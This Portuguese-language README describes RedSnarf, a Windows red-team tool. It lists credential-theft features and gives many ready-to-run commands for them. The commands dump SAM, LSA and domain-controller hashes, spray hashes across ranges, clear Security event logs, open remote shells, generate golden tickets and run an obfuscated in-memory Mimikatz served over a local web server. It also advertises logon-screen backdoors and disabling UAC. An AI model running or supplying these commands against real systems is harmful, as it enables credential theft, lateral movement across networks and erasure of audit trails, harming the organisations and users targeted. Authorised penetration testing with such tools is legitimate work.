
RedSnarf é uma ferramenta de pen-testing / red team para ambientes Windows.
______ .____________ _____
\______ \ ____ __| _/ _____/ ____ _____ ________/ ____\
| _// __ \ / __ |\_____ \ / \\__ \\_ __ \ __\
| | \ ___// /_/ |/ \ | \/ __ \| | \/| |
|____|_ /\___ >____ /_______ /___| (____ /__| |__|
\/ \/ \/ \/ \/ \/
[email protected]
@redsnarf
RedSnarf é uma ferramenta de teste de penetração / equipe vermelha criada por Ed Williams para recuperar hashes e credenciais de estações de trabalho, servidores e controladores de domínio Windows usando Técnicas Seguras de OpSec.
Veja nosso Canal no YouTube para Vídeos https://www.youtube.com/channel/UCDGWRxpHo6d8y6qIeMAXnxQ
A funcionalidade do RedSnarf inclui:
• Recuperação de hashes SAM locais • Enumeração de usuários em execução com privilégios elevados de sistema e suas senhas lsa secrets correspondentes; • Recuperação de credenciais em cache do MS; • Pass-the-hash; • Identificar rapidamente combinações fracas e adivinháveis de nome de usuário/senha (padrão de administrator/Password01); • Capacidade de recuperar hashes em uma faixa; • Hash spraying - Credsfile aceitará uma mistura de pwdump, fgdump e nome de usuário e senha em texto simples separados por um espaço; • Despejo de Lsass para análise offline com Mimikatz; • Despejo de hashes de controlador de domínio usando NTDSUtil e recuperação de NTDS.dit para análise local; • Despejo de hashes de controlador de domínio usando o método drsuapi; • Recuperação da pasta Scripts e Policies de um controlador de domínio e análise por 'password' e 'administrator'; • Capacidade de descriptografar hashes cpassword; • Capacidade de iniciar um shell em uma máquina remota; • Capacidade de limpar os logs de eventos (aplicativo, segurança, configuração ou sistema); (Apenas versão interna) • Os resultados são salvos por host para análise. • Ativar/Desativar RDP em uma máquina remota. • Alterar a porta RDP de 3389 para 443 em uma máquina remota. • Ativar/Desativar NLA em uma máquina remota. • Encontrar onde os usuários estão logados em máquinas remotas. • Backdoor na Tela de Logon do Windows • Ativar/Desativar UAC em uma máquina remota. • Mimikatz furtivo adicionado. • Análise de hashes de domínio • Capacidade de determinar quais contas estão ativadas/desativadas • Tirar uma captura de tela da Área de Trabalho de Usuários Ativos Logados Remotamente • Gravar a Área de Trabalho de Usuários Ativos Logados Remotamente • Descriptografar CPassword do Windows • Descriptografar Senha do WinSCP • Obter SPNs de Usuário • Recuperar senhas WIFI de máquinas remotas
Requisitos: Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git CredDump7 - https://github.com/Neohapsis/creddump7 Recuperação de Lsass usando procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx Netaddr (0.7.12) - pip install netaddr Termcolor (1.1.0) - pip install termcolor iconv - usado na análise de informações do Mimikatz localmente
Mostrar Ajuda ./redsnarf.py -h ./redsnarf.py --help
Recuperar Hashes Locais de uma única máquina usando credenciais locais fracas e limpando o log de eventos de Segurança ./redsnarf.py -H ip=10.0.0.50 -uC security
Recuperar Hashes Locais de uma única máquina usando credenciais locais fracas e limpando o log de eventos de aplicativo ./redsnarf.py -H ip=10.0.0.50 -uC application
Recuperar Hashes Locais de uma única máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .
Recuperar Hashes Locais de uma única máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com
Recuperar Hashes em uma faixa de rede usando credenciais de administrador local ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .
Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio ./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com
Recuperar Hashes em uma faixa de rede usando credenciais de administrador de domínio ./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com
Borrifar Hashes em uma faixa de rede ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .
Recuperar Hashes em uma faixa de rede com login de domínio ./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com
Verificar Credenciais Rapidamente ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y
Verificar Rapidamente Arquivo contendo nomes de usuário (-hS) e uma senha genérica (-hP) ./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y
Recuperar Hashes usando o método drsuapi (Mais rápido) Este método suporta uma flag opcional de -q y que consultará o LDAP e exibirá se as contas estão ativas ou desativadas ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)
Recuperar Hashes usando NTDSUtil Este método suporta uma flag opcional de -q y que consultará o LDAP e exibirá se as contas estão ativas ou desativadas ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)
Geração de Golden Ticket ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y
Copiar a pasta Policies e Scripts de um Controlador de Domínio e analisar por password e administrator ./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y
Descriptografar Cpassword ./redsnarf.py -uG cpassword
Encontrar Usuário - Ao Vivo /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name
Encontrar Usuário - Offline (pesquisa informações baixadas anteriormente) /redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name
Exibir Lista de Tarefas de NT AUTHORITY\SYSTEM /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y
Capturar a Área de Trabalho de um Usuário Ativo Logado Remotamente /redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y
Iniciar um Shell em uma máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y
Iniciar um Shell em uma máquina usando credenciais de administrador de domínio ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y
Recuperar uma cópia do lsass para análise offline com Mimikatz em uma máquina usando credenciais de administrador local ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y
Executar mimikatz furtivo, esta opção inicia um servidor web para servir um script powershell, que é ofuscado e codificado do lado da máquina, os dados não tocam no disco - as credenciais são grepped em um estilo fácil de ler e ecoadas de volta para a tela. ./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y
Executar Comando Personalizado Exemplo 1 ./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'